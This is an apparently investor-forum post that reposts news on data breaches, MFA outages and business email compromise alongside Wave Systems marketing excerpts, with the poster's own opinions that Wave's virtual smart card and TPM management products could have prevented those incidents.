It is also no surprise that Sen. Wyden was behind the push to have the Senate deploy disk encryption. Previously, the same Senator had also asked the government to stop using Adobe Flash on its computers and sites, urged the DOD to move all of its sites to HTTPS by the end of the year, asked the White House Cybersecurity Coordinator to deploy a solution that blocks ads on US government networks and computers to ward off malvertising, and has pressed the DHS to deploy an emerging technology called Encrypted Server Name Identification (ESNI).
He also called out the FBI director's 'ill-informed' views on encryption backdoors, pushed Verizon, Sprint, AT&T, and T-Mobile to stop sharing real-time cell phone location data with third-party companies, revealed that US border officials haven't properly verified visitor passports for more than a decade, and inquired the FCC to find out if police stingrays disrupt 911 calls.
=================================================================
Wave's MFA (multi factor authentication) should be benefiting those employees in the U.S. government as it has been tested and used there (see PR below). And Wave's other main product SED management should also be used in the U.S. government. imo. (see link below) Two amazing products under one company that could protect the government in a big way! At least with this announcement, the Senate is leading what could be a fresh movement in the market for Wave's encryption management!
================================================================
Wave Systems Announces First U.S. Federal Government Customer for Wave Virtual Smart Card 2.0
https://www.wavesys.com/buzz/pr/wave-systems-announces-first-us-federal-government-customer-wave-virtual-smart-card-2.0
Lee, MA -
October 2, 2014 -
Wave Systems Corp. (NASDAQ: WAVX) marked an important sales milestone by announcing the first U.S. federal government customer for its Virtual Smart Card 2.0.
Since the Virtual Smart Card 2.0 became commercially available in late July 2014, Wave has entered into dozens of pilot deployments in multiple sectors, including healthcare, financial services, automotive, energy and utilities. However, today’s announcement marks the product’s first sale in the government sector.
“This is an important milestone for Wave,” said Bill Solms, CEO of Wave. “Wave Virtual Smart Card 2.0 has been purchased by a government agency with significant security requirements and one that requires redundant means of system authentication due to national security interests. This initial sale is modest compared to the addressable market within the Federal Government sector, but it is important to our strategy for marketing the Virtual Smart Card to address critical government infrastructure defense.”
“We believe that this sale, which was completed on a shorter sales cycle than we had anticipated, supports our view that customers are interested in the type of cyber security solution that Wave’s Virtual Smart Card 2.0 provides,” Solms added.
Wave Virtual Smart Card 2.0 is the industry’s only enterprise-grade virtual smart card management solution that works on Windows 7. It also supports Windows 8 and 8.1. Wave’s new solution emulates the functionality of physical smart cards or tokens, but offers greater convenience to users, lower total cost of ownership, and a reduced risk of unauthorized use.
Wave Virtual Smart Card 2.0 gives IT the ability to:
• Remotely create and delete virtual smart cards
• Provide help desk-assisted recovery
• Configure PIN and card policies
• View the status of virtual smart cards and enrolled certificates
• Generate reports for compliance
• Support virtual smart cards on laptops, tablets and desktops with TPM 1.2 or TPM 2.0
=================================================================
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Excerpt:
No SEDs yet? No problem.
If your organization hasn’t yet deployed SEDs, you can skip the process of retro-fitting and simply incorporate SEDs on all new laptops as part of your regular refresh cycle. In the meantime, the same Wave console can manage BitLocker and SEDs, so you can protect the devices you have now with BitLocker and add those with SEDs as they are deployed. And if you’re using Wave’s cloud platform, you can also support OSX FileVault2.
2014 Marriott Data Breach Exposed, 500M Guests Impacted
https://threatpost.com/2014-marriott-data-breach-exposed-500m-guests-impacted/139507/
The hackers had access to the impacted database since 2014.
Marriott said that a massive data breach of its guest reservation system has left up to 500 million guests’ data exposed and available for the taking. Worse, the attackers may have had access to the systems for at least four years before being discovered.
The hotel company said in a statement on its website that hackers gained access to the Starwood reservation database. Starwood, which includes hotels like St. Regis and Sheraton, was bought by Marriott in 2016.
The hackers gained unauthorized access to Starwoods’ network back in 2014. Marriott said it discovered the breach on Sept. 8.
“The company has not finished identifying duplicate information in the database, but believes it contains information on up to approximately 500 million guests who made a reservation at a Starwood property,” the company said in its statement.
Marriott did not respond to a request for comment about how the database was accessed.
Marriott said that hackers stole data like name, mailing address, phone number, email address, passport number, Starwood Preferred Guest account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences for 327 million of these guests.
For others, information stolen also includes payment card numbers and payment card expiration dates. The payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128), stressed the company.
“There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken,” the company said. “For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information.”
Security experts, such as Daniel Cuthbert, global head of cyber security research at Banco Santander, were astounded that the hack has been ongoing for four years without discovery.
Marriott has also had minor security issues in the past. Kevin Beaumont pointed back to past security incidents with Marriott wherein a remote access trojan located inside the company’s network had access to their Cyber Incident Response Team mailbox in 2017.
Backlash
The incident has left infosec community members and hotel guests scratching their heads about how the hackers could have stayed undetected for four years.
“Four years of unauthorized access is an eternity for hackers, so members of the Starwood rewards program need to keep a close eye on their balances, as attackers will often try to steal and monetize rewards points,” said Ben Johnson, co-founder and CTO of Obsidian Security. “While the recognition of the breach and an apology are important steps forward, Marriott must upgrade its ability to detect compromises like this much faster, and should move swiftly to protect the rewards accounts and personal information of its loyal members.”
Brian Vecci, technical evangelist at Varonis, pointed to the breach as a “textbook” example of how hackers are becoming smarter about building persistence when they breach critical systems.
“Threat actors are smart and getting smarter so it’s hard to catch them in the act, but not only did Marriott fail to protect customer records, they failed to detect the leakage of this data since 2014,” he said. “This breach is a textbook example of attacker dwell time, and how once an attacker compromises an organization their goal is not typically to smash and grab, but to build persistence mechanisms and backdoors to stay in a network and continue to steal critical information year after year.”
Meanwhile, the New York Attorney General’s office declared it was opening an investigation into the Marriott data breach. “New Yorkers deserve to know that their personal information will be protected,” NY Attorney General Barbara Underwood said in a Tweet.
Marriott said it will begin sending emails on a rolling basis starting today, November 30, 2018, to affected guests whose email addresses are in the Starwood guest reservation database.
misc. twitter posts in article are at the link-
=================================================================
Remote Access Trojan (or RAT) above could have been prevented by Wave Endpoint Monitor. Also, Wave VSC 2.0 and Wave ERAS could have kept the bad guys (unknown devices) from ever entering the network in the first place. The Wave VSC 2.0 White Paper introduction makes reference to some of the old mega breaches, and Wave VSC 2.0 if used was meant to prevent or stop those mega breaches like those from ever happening. Organizations (Marriott) continue to have mega breaches in part because they haven't found a two factor authentication (2FA) solution like Wave VSC 2.0 and Wave Endpoint Monitor as well. imo.
=================================================================
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
Cyber-threats are everywhere, but with Wave Virtual Smart Card 2.0 (Wave VSC 2.0) enterprises have a hardware-based, tokenless, two-factor authentication security solution with the security of a hardware token solution and the convenience and cost savings of a software token solution.
Wave VSC 2.0 delivers strong two-factor authentication using the Trusted Platform Module (TPM), the embedded security chip built into enterprise PCs. Wave empowers IT with management of the TPM and VSC 2.0. Companies successfully use Wave VSC 2.0 to secure VPN access, web applications and other certificate-based applications, like Wi-Fi with 802.1x, remote desktop, or Windows-user login. Use the security that’s already been deployed and save money with Wave VSC 2.0.
Every month we see headlines highlighting mammoth breaches (i.e. EBay, JP Morgan Chase, Sony, Target, etc…). In each case, millions of records were stolen, corporate images were tarnished, and enormous costs were incurred as a result. And equally disturbing, more often than not the attacks go undetected and as a result important information is stolen.
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Dell announces security breach
https://www.zdnet.com/article/dell-announces-security-breach/
Company says it detected an intrusion at the start of the month, but financial data was not exposed.
US-based hardware giant Dell announced today a security breach that took place earlier this month, on November 9.
Dell says it detected an unauthorized intruder (or intruders) "attempting to extract Dell.com customer information" from its systems, such as customer names, email addresses, and hashed passwords. The company didn't go into details about the complexity of the password hashing algorithm, but some of these --such as MD5-- can be broken within seconds to reveal the plaintext password.
"Though it is possible some of this information was removed from Dell's network, our investigations found no conclusive evidence that any was extracted," Dell said today in a press release.
In a statement sent to ZDNet, Dell said it's still investigating the incident, but said the breach wasn't extensive, with the company's engineers detecting the intrusion on the same day it happened. A Dell spokesperson declined to give out a number of affected accounts, saying "it would be imprudent to publish potential numbers when there may be none."
The company also said hackers didn't target payment card or any other sensitive customer information, and that the incident didn't cause a disruption of its normal services at the time of the breach or after.
Dell initiated a password reset for all Dell.com customer accounts after it detected the intrusion earlier this month.
The company said it notified law enforcement, and also hired a digital forensics firm to perform an independent investigation.
Based on currently revealed details, Dell appears to have exposed very little information associated with its official website, where most users come to shop official products or have discussions on its official support forums.
While Dell has downplayed the incident's impact, it is worth mentioning that many breached companies amend these initial revelations as their investigations advance.
Besides resetting passwords, Dell.com users should manually review what information they've stored in their respective accounts. In case they've saved financial information, they should keep an eye on card statements, to be on the safe side.
=================================================================
Wave VSC 2.0 and Wave ERAS could have prevented the intruder (unknown device) from accessing the Dell network. Dell owns RSA Securid and was probably using that two factor authentication to try to limit exposure to their network. RSA Securid doesn't have the feature of keeping unknown devices off the network (as revealed in the article) in a more effective way than Wave does. imo. see below.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
=================================================================
Wave Announces 5-Year Master License Agreement for Virtual Smart Card 2.0 with Leading Global Financial Services Company
Wins competitive evaluation against market leader in two-factor authentication tokens
https://www.wavesys.com/buzz/pr/wave-announces-5-year-master-license-agreement-virtual-smart-card-20-leading-global
Microsoft's multi-factor authentication service goes down for second week in a row
https://www.zdnet.com/article/microsofts-multi-factor-authentication-service-goes-down-for-second-week-in-a-row/
Another Microsoft's Azure Active Directory multi-factor authentication service outage is causing problems for a number of Office 365 users.
Just over a week after a global problem with its multi-factor authentication (MFA) service plagued a number of users, another Microsoft MFA outage is impacting a number of customers. Many, but not all, of the customers reporting problems today seem to be U.S.-based.
Starting around 9:15 a.m. ET, a number of Office 365 customers began reporting on Twitter that they were unable to sign into that service because of an MFA issue. Office 365 is one of a number of Microsoft services that uses Azure Active Directory MFA to authenticate.
Around 10:15 a.m. ET, Microsoft's Azure status dashboard was updated to reflect the possibility of a cross-region potential outage impacting MFA.
"Impacted customers may experience failures when attempting to authenticate into Azure resources where MFA is required by policy. Engineers are investigating the issue and the next update will be provided in 60 minutes or as events warrant," the dashboard status said.
The Microsoft 365 Status account on Twitter noted around 10:38 a.m. ET:
"We're investigating an issue where users may be unable to sign in using Multi-Factor Authorization (MFA). All details can be found under Service Incident (SI) #MO165847."
For 14 hours on November 19, Microsoft's MFA services went down for many Microsoft customers.
Microsoft's Azure team recently went public with the root cause it discovered when investigating the outage. Microsoft unearthed three independent root causes, along with monitoring gaps that resulted in Azure, Office 365, Dynamics and other Microsoft users not being able to authenticate for much of that day. Microsoft officials described a multi-pronged plan to try to keep this kind of outage from happening, but said some of the required steps might not be completed until January 2019.
Update (11:40 a.m. ET): The mitigation has begun. From the Azure status page:
"CURRENT MITIGATION: Engineers are currently in the process of cycling backend services responsible for processing MFA requests. This mitigation step is being rolled out region by region with a number of regions already completed. Engineers are reassessing impact after each region completes."
Update (12:25 pm ET): As the mitigation continues, Microsoft engineers say they've identified the cause of today's issue. From the Azure status page:
"Engineers have also determined a Domain Name System (DNS) issue caused sign-in requests to fail, but this issue is mitigated and engineers are restarting the authentication infrastructure."
On the Azure status page, Microsoft officials say a full root-cause analysis of today's outage will be posted within 72 hours.
==================================================================
Given Microsoft's experience with 2FA and what has been going on with Windows 10, 1809 upgrades, it seems that Wave VSC 2.0 could be the better way to go for a lot of organizations' 2FA.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
White paper:
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
Multifactor Authentication Market to be worth US$20444.9 Million by 2025; Strict Rules by Government to Guard and Preserve National Secrets Bolsters Market Growth - TMR
https://globenewswire.com/news-release/2018/11/26/1656656/0/en/Multifactor-Authentication-Market-to-be-worth-US-20444-9-Million-by-2025-Strict-Rules-by-Government-to-Guard-and-Preserve-National-Secrets-Bolsters-Market-Growth-TMR.html
Global Multifactor Authentication Market: Governments to Boost Uptake as Need for Better Security Measures Grows, observes TMR
Albany, New York, Nov. 26, 2018 (GLOBE NEWSWIRE) -- According to the recent study by Transparency Market Research, the global multifactor authentication market is likely to expand at a robust CAGR of 17.7% during the tenure period. The market which was valued at US$4829.2 mn by the end of 2016 is foreseen to rise and reach a valuation of US$20444.9 Mn by the end of assessed period. On the basis of models, the market is segmented into three-factor authentication, four-factor authentication, and two-factor authentication. Of these two-factor authentication market is predicted to witness a stellar demand as consumers have started preferring two-step verification process. On the basis of region, the multifactor authentication market is likely to be dominated by North America, as the region experiences surge in adoption of multifactor authentication models due to increasing security concerns.
The global multifactor authentication market is predicted to witness a strong growth during the forecast period 2017 – 2025, owing to rise in demand for a better security solutions. Transparency Market Research notices that the market is highly fragmented in nature owing to the presence of several players. Senior analysts expects that the strategic partnerships such as mergers and acquisitions taken up by key players are likely to help them give them a strong foothold in untapped market. Players are spending hefty amount in research and development activities to innovate and introduce more efficient and enhanced products for consumers. This is likely to drive the multifactor authentication market in forward direction. It is anticipated that as the number of player increases, the competition will become more intense. Some of the major players in the multifactor authentication market are Vasco, EMC, Entrust, and Gemalto.
rest is at the link -
=================================================================
'Better security at less than half the cost' should make Wave a major player in the multifactor authentication market with Wave VSC 2.0!! imo.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Get better security at less than half the cost
Passwords are weak. Tokens are expensive. Don’t compromise on security or price.
Wave Virtual Smart Card does anything your physical smart cards and tokens do, but it starts with hardware you already have: the Trusted Platform Module (TPM), a hardware security chip built into the motherboard of most business-class PCs. You may not even know you have it, but once you do, the TPM can be used in a myriad of ways. Wave turns it into a smart card, embedded directly into your laptop.
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
One helpdesk call you'll never get: "I lost my virtual smart card again..."
There are so many ways to lose a token – couch cushions, street drains, curious toddlers. In fact, up to 30% of all tokens are eventually lost. It’s much harder to lose a laptop, and you notice a lot faster when you do.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
What will you do with >50% TCO savings?*
Tokens and smart cards require an additional hardware purchase, plus the time and money to ship to remote users. Use something that’s already in the users’ hands (the TPM), and your acquisition and deployment costs are lower.
Then consider the management savings in not having to replace lost and stolen tokens. That means fewer helpdesk calls, less interruption of user productivity, and fewer acquisition and shipping costs.
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
Key Features:
• Full lifecycle management of virtual smart cards
• Intuitive interface to create (or delete) virtual smart cards
• Command line option to create and delete virtual smart cards
• Flexible PIN policies
• Helpdesk-assisted PIN reset and recovery
• Generates reports for compliance
• Integrates with Active Directory
• Supports familiar use cases ? Virtual Private Network (VPN)
? Local logon
? Remote logon
? Remote desktop access
? Intranet/Extranet
? Cloud applications
=================================================================
White paper:
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
=================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Attackers Are Landing Email Inboxes Without the Need to Phish
https://www.securityweek.com/attackers-are-landing-email-inboxes-without-need-phish
We’ve all heard the proverb: Give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime. Well now, threat actors don’t even have to exert the effort to phish to land business email accounts.
According to an alert published earlier this year by the FBI, Business Email Compromise (BEC) and Email Account Compromise (EAC) have caused $12 billion in losses since October 2013. Traditionally, social engineering and intrusion techniques have been the most common ways to gain access to business email accounts and dupe individuals to wire funds to an attacker-controlled account. These methods play out as follows:
1. Social engineering and email spoofing: Attackers will use social engineering to pose as a colleague or business partner and send fake requests for information or the transfer of funds. These emails can be quite convincing as the attacker makes a significant effort to identify an appropriate victim and register a fake domain, so that at first glance the email appears to belong to a colleague or supplier.
2. Account takeover: Here, attackers use information-stealing malware and key loggers to gain access to and hijack a corporate email account, which they then use to make fraudulent requests to colleagues, accounting departments and suppliers. They can also alter mailbox rules so that the victim’s email messages are forwarded to the attacker, or emails sent by the attacker are deleted from the list of sent emails.
These techniques have served threat actors well for quite some time. But now we are seeing new, more expeditious methods emerge to gain access to business email accounts. Compromised credentials being offered on criminal forums, exposed through third-party compromises, or vulnerable through misconfigured backups and file sharing services, make the opportunity to profit from BEC easier than ever. Email inboxes are also being used not just to request wire transfers, but to steal financially-sensitive information stored within these accounts or to request information from other employees. With declining barriers to entry for BEC, and more ways to monetize this type of fraud, we can expect the losses to continue to rise and perhaps even accelerate in the near term.
Here’s how these alternative methods work:
1. Paying for access. It’s common for accounts to be shared and sold across criminal forums, and the emails of finance departments and CEO/CFOs are no exception. It’s even possible to outsource this work to online actors who will acquire company credentials for a percentage of earnings or a set fee beginning as low as $150.
2. Getting lucky with previously compromised credentials. As I’ve discussed before, individuals will often reuse passwords across multiple accounts. In our research we’ve detected more than 33,000 finance department email addresses exposed within our own third-party data breach repository 83 percent of which had passwords associated. With many email and password combinations of finance department email accounts already compromised, cybercriminals can get lucky.
3. Searching across misconfigured archives and file stores. Inboxes, particularly those of finance departments and CEO/CFOs, are replete with financially-sensitive information such as contract scans, purchase orders, and payroll and tax documents. This information can be used for fraud or re-sold on forums and marketplaces. The sad reality is that there’s no need to go to a dark web market when sensitive data is available for free on the open web. Employees and contractors sometimes turn to easy, rather than secure, ways of archiving their emails. We identified that more than 12.5 million email archive files and 50,000 emails that contained “invoice”, “payment” or “purchase order” have been exposed due to unauthenticated or misconfigured file stores.
Regardless of the method attackers use to perform a BEC scam, these seven security measures can help to mitigate the risks.
1. Update your security awareness training content to include the BEC scenario. This should be a part of new hire training, but you should conduct ad-hoc training for this scenario now.
2. Build BEC into your contingency plans, just as you have built ransomware and destructive malware into your incident response/business continuity planning.
3. Work with your wire transfer application vendors to build in manual controls as well as multiple person authorizations to approve significant wire transfers.
4. Monitor for exposed credentials. This is crucial for your finance department email, but it’s important for all user accounts. Multifactor authentication will also increase the difficulty for attackers to perform account takeovers.
5. Conduct ongoing assessments of your executives’ digital footprints. You can start with using Google Alerts to track new web content related to them.
6. Prevent email archives from being publicly exposed. For services like Server Message Block (SMB), rsync and the File Transfer Protocol (FTP), use a strong, unique password and disable guest or anonymous access and firewall the port off from the Internet. If it needs to be on the Internet or without a password, then make sure you whitelist the IPs which are expressly permitted to access the resource.
7. Be aware of the risks of contractors who back up their emails on Network Attached Storage (NAS) devices. Users should add a password and disable guest/anonymous access, as well as opt for NAS devices that are secured by default. Ideally, organizations should provide training on the risks of using home NAS drives, as well as offer backup solutions so that contractors and employees don’t feel the need to backup their devices at home.
BEC is becoming increasingly profitable for threat actors as organizations are making it easy for adversaries to gain access to the valuable information that sits within these inboxes. However, with the right combination of people, processes and technology, organizations can mitigate the risk.
=================================================================
A great feature to Wave VSC 2.0 imo is that it isn't susceptible to keyloggers since the user is automatically logged into the site without entering a password. Wave VSC 2.0 could be a big help here!!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.